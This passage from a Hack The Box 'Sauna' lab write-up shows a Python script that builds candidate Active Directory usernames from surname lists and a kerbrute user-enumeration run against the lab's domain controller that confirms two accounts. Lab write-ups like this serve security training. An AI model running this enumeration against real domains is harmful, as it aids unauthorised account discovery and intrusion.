Naming Convention

I was able to extract 2 valid domain users by brute-forcing the target KDC, and the result suggests that the naming convention used is the first letter of FIRSTNAME followed by LASTNAME; hsmith and fsmith

While that was successful, I was also able to get some potential users from the web server

Using those information above, I can craft a list of potential usernames

username_generator.py

import os
import sys
import string
 
####
import random
####
 
 
def main():
	format_text = "Choose username format:" + "\n"
	format_text += "1) hsimpson" + "\n"
	format_text += "2) h.simpson" + "\n"
	format_text += "3) homersimpson" + "\n"
	format_text += "4) homer.simpson" + "\n"
	format_text += "5) hjsimpson" + "\n"
	format_text += "6) homerjsimpson" + "\n"
	format_text += "7) homerjaysimpson" + "\n"
	format_text += "8) homersimpsonb" + "\n"
	format_text += "Option: "
	format_option = input(format_text)
 
	mail_domain = input("Mail domain (example: ...@domain.com) [Default: none]: ")
	domain =      input("Domain (example: domain\\...) [Default: none]: ") if mail_domain == '' else None
 
	names_,surnames_ = None, None
	if format_option == "3" or format_option == "4" or format_option == "6" or format_option == "7" or format_option == "8":
		names = input("Names file path: ")
		if not os.path.isfile(names):
			print("Error: Invalid names file path")
			sys.exit(0)
		names_ = open(names).read().splitlines()
 
	surnames = input("Surnames file path: ")
	if not os.path.isfile(surnames):
		print("Error: Invalid surnames file path")
		sys.exit(0)
	surnames_ = open(surnames).read().splitlines()
 
	combinations = get_usernames(format_option, names_, surnames_)
	output_file = input("Output file [Default: results.txt]: ") or "results.txt"
	output_to_file(combinations, output_file, mail_domain, domain)
 
 
def get_usernames(format_option, names_, surnames_):
	combinations = []
	letters_ = string.ascii_lowercase
 
	if format_option == "1":
		for s in surnames_:
			for l in letters_:
				combinations.append(l+s)
 
	elif format_option == "2":
		for s in surnames_:
			for l in letters_:
				combinations.append(l+"."+s)
 
	elif format_option == "3":
		for s in surnames_:
			for n in names_:
				combinations.append(n+s)
 
	elif format_option == "4":
		for s in surnames_:
			for n in names_:
				combinations.append(n+"."+s)
 
	elif format_option == "5":
		for s in surnames_:
			for l2 in letters_:
				for l in letters_:
					combinations.append(l+l2+s)
 
	elif format_option == "6":
		for s in surnames_:
			for l in letters_:
				for n in names_:
					combinations.append(n+l+s)
 
	elif format_option == "7":
		for s in surnames_:
			for n2 in names_:
				for n in names_:
					combinations.append(n+n2+s)
 
	elif format_option == "8":
		for s in surnames_:
			for n in names_:
				for l in letters_:
					combinations.append(n+s+l)
 
	else:
		print("Invalid option")
 
	return combinations
 
 
def output_to_file(combinations, output_file, mail_domain, domain):
	with open(output_file , 'w') as f:
		for c in combinations:
			if mail_domain != '':
				f.write("%s\n" % (c+"@"+mail_domain))
			elif domain != '':
				f.write("%s\n" % (domain+"\\"+c))
			else:
				f.write("%s\n" % (c))
 
	print ("Output saved in %s"%(output_file))
 
 
if __name__ == "__main__":
	main()

This is a very simple username generator written in Python

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 1
Mail domain (example: ...@domain.com) [Default: none]: 
Domain (example: domain\...) [Default: none]: 
Surnames file path: /home/kali/archive/htb/labs/sauna/lastname
Output file [Default: results.txt]: list.txt
Output saved in list.txt

I am going with the option 1 as the naming convention used is the first letter of FIRSTNAME followed by LASTNAME It saved to the list.txt file

I can now use that file containing potential usernames to perform a brute force attack and validate users

Brute Force Attack

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ kerbrute userenum --dc sauna.egotistical-bank.local -d EGOTISTICAL-BANK.LOCAL ./list.txt 
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 03/25/23 - Ronnie Flathers @ropnop
 
2023/03/25 17:40:56 >  Using KDC(s):
2023/03/25 17:40:56 >  	sauna.egotistical-bank.local:88
 
2023/03/25 17:40:56 >  [+] VALID USERNAME:	 hsmith@EGOTISTICAL-BANK.LOCAL
2023/03/25 17:40:56 >  [+] VALID USERNAME:	 fsmith@EGOTISTICAL-BANK.LOCAL
2023/03/25 17:41:01 >  Done! Tested 208 usernames (2 valid) in 5.311 seconds

Unfortunately, I am unable to validate any user other than what’s already known. This confirms that none of the users that I found from the web sever are domain users

InfoSec LAB

Explorer

Sauna_Naming_Convention

Naming Convention

username_generator.py

Brute Force Attack

Interactive Graph View

Table of Contents

Backlinks